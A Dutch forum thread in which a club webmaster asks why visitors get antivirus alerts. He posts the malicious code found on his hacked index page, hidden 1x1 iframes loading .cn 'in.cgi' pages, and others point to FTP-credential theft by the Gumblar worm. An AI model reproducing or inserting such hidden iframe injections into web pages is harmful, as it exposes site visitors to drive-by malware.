Threat name: Exploit JavaScript Obfuscation (type 628)

[bensink002]

@Allen

 

Ik heb een website gebouwd voor de fietscrossclub FCC de Marnecrossers (www.marnecrossers.nl). Als ik de website benader, dan heb ik totaal geen problemen. Ik krijg echter van enkele leden te horen, dat zij de onderstaande melding krijgen:

 

File name: wezdujur.cn/nuc/index.php en Threat name: Exploit JavaScript Obfuscation (type 628)

 

Ik maak inderdaad gebruik van Java scripts en ik snap ook dat de gebruikte virusscanner (AVG) van mening is dat er iets niet zou kloppen. Kan iemand mij misschien iets meer vertellen over deze melding? Ik heb uiteraard al op internet gezocht, maar ik heb het nog niet kunnen vinden.

 

Al vast bedankt.

[Kowalski]

Ik heb zo'n vermoeden dat dat kan liggen aan de ingebouwde statistieken van gostats.com en dat die weer verwijst naar die vreemde Chinese site. Haal die gostats.com maar eens weg en vraag aan de leden nog eens of de melding komt.

[Puch]

Die free bezoekers tellers zijn idd geen goed idee op je site.

 

Dit brengt popup's en dergelijk rommel met zich mee.

 

[Gast SatMann]

wel dat is nu eens heel simpel uit te leggen.

 

er is op je hosting een attack gebeurt.

daardoor zit een verborgen IFrame op alle pagina's met de naam index.

dus index.hmtl, index.htm, index.asp, index.php

 

wat jij kan doen is je orginele pagina's terug opladen en je probleem zal opgelost zijn.

 

Je moet ook je hostingsfirma waar jij aan huurt op de hoogte brengen gezien het probleem zich in de application pool bevindt en zij dus moeten instaan voor de veiligheid.

 

het lek zou komen via de wordpress in php plugin.

 

voila, succes ermee

SatMann

[bensink002]

@SatMann

 

het probleem deed zich maar voor bij een van de leden. Ik heb er eigenlijk verder niemand over gehoord, dat ze de bovenstaande melding ook kregen.

 

Wat ik inderdaad wel heb gekonstateerd is dat min indexpagina enkele weken geleden ineens overhoop lag. Ik kon nog wel navigeren naar de onderliggende pagina's, maar de foto op de index was verdwenen en de lopende tekstbalk aan de rechter kant vond ik aan de linker kant terug. Ik heb dezelfde avond de originele index pagina terug gezet en daarmee was het probleem inderdaad opgelost.

 

Ik heb de "gehackte" pagina veilig gesteld en ik wil uiteraard graag weten wat men heeft willen uithalen. Een iframe kan voor zover ik weet een document bevatten. Heb jij misschien enig idee?

 

Al vast bedankt.

[bensink002]

@SatMann

 

mijn index pagina is vanacht opnieuw gehacked. Ik heb de index pagina opnieuw veilig gesteld en ik heb het onderstaande gevonden op 24 april:

 

<BODY LEFTMARGIN="0" MARGINWIDTH="0" TOPMARGIN="0" MARGINHEIGHT="0" bgcolor="#FFFFFF" text="#000033" link="#000099" vlink="#990099" alink="#990000"><iframe src="http://litegreatestdirect.cn/in.cgi?income72" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litecarfinestsite.cn/in.cgi?income72" width=1 height=1 style="visibility: hidden"></iframe><iframe frameborder=0 border=0 height=1 width=1 src="http://habrion.cn/in.cgi?6" />

<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" width="101%" height="100%">

<TR>

 

op 18 mei:

 

<BODY LEFTMARGIN="0" MARGINWIDTH="0" TOPMARGIN="0" MARGINHEIGHT="0" bgcolor="#FFFFFF" text="#000033" link="#000099" vlink="#990099" alink="#990000"><iframe src="http://bestwebfind.cn:8080/ts/in.cgi?pepsi11" width=2 height=4 style="visibility: hidden"></iframe>

<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" width="101%" height="100%">

<TR>

 

Als ik dit zo lees, dan zou er in beide gevallen een cgi script gedraaid moeten worden. Kun je me hier iets meer over vertellen??

 

Al vast bedankt.

[Kowalski]

Ik zou maar snel je FTP wachtwoord wijzigen (en liefst in een moeilijk wachtwoord bestaande uit minimaal 8 tekens: hoofd-, kleine letters en cijfers door elkaar).

[bensink002]

@Frank67

 

mijn wachtwoord staat nog steeds op hetzelfde als wat ik ooit van mijn provider heb gekregen (hoofdletters, kleine letters en cijfers). Dit is in ieder geval een beter wachtwoord als wat ik elders gebruik, maar je hebt in ieder geval gelijk. Ik zal het wijzigen.

[Kowalski]

Het wijzigen van je wachtwoord is geen garantie dat er geen hacker op je website komt, maar je moet ergens beginnen he?

Onlangs dook een nieuwsbericht op dat *nix servers het doelwit zijn van hackers.

Op security.nl staat bijv. dit bericht: Honderden *nix servers besmet met Trojaans paard

Dus het kan ook best zo zijn dat je provider de zaakjes niet helemaal goed op orde heeft, en dat een hacker bij de webpagina's kan via een achterdeurtje.

[bensink002]

@Frank67

 

Ik heb mijn wachtwoorden vanochtend gewijzigd. Ik heb verder een vraag uitstaan bij mijn provider en ik wacht dus nog even op antwoord. Ik heb zelf ook al de nodige informatie gevonden:

 

http://forums.cpanel.net/showpost.php?p=363225&postcount=26

 

Het ziet er niet fraai uit. In het ergste geval moet ik in ieder geval formatteren.

 

Bedankt voor je antwoorden.

[Kowalski]

Goed gevonden. In dat geval zou ik eens ComboFix laten draaien. Daarmee kun je (hardnekkige) rootkits en dergelijke van je PC verwijderen, en baat het niet, schaadt het niet.

[Pionewbie]

Zoek ook eens op Gumblar.

Gumblar virus steelt FTP-gegevens, besmet websites

[Kowalski]

Staat toevallig vandaag op nu.nl:

Citaat:

AMSTERDAM - Een internetworm die onder meer zoekresultaten van Google vergiftigt, grijpt snel om zich heen.

 

Daarvoor waarschuwt onder meer de Amerikaanse digitale veiligheidsorganisatie US-CERT. De worm, die Gumblar is gedoopt, infecteert websites met kwaadaardige code. Dankzij kwetsbaarheden in Adobe Reader en Flash kunnen bezoekers van die sites besmet raken als ze webbrowser Internet Explorer gebruiken.

 

Op besmette pc's gaat Gumblar vervolgens op zoek naar inloggegevens voor zogenoemde FTP-sites, die de worm dan gebruikt om zichzelf daar verder te verspreiden. Gumblar zou zo inmiddels vele duizenden websites hebben besmet.

 

Google

 

Ook past Gumblar de resultaten van zoekmachine Google op besmette computers aan. Gebruikers worden via de vergiftigde zoekresultaten verwezen naar websites waarop meer kwaadaardige software wordt verspreid.

 

Die aanpassing vindt overigens plaats op de pc van het slachtoffer, niet bij Google zelf.

 

Adobe heeft al geruime tijd geleden updates uitgebracht voor de lekken die door Gumblar worden misbruikt. Het bedrijf roept gebruikers op de nieuwste versies van Adobe Reader en Flash te installeren.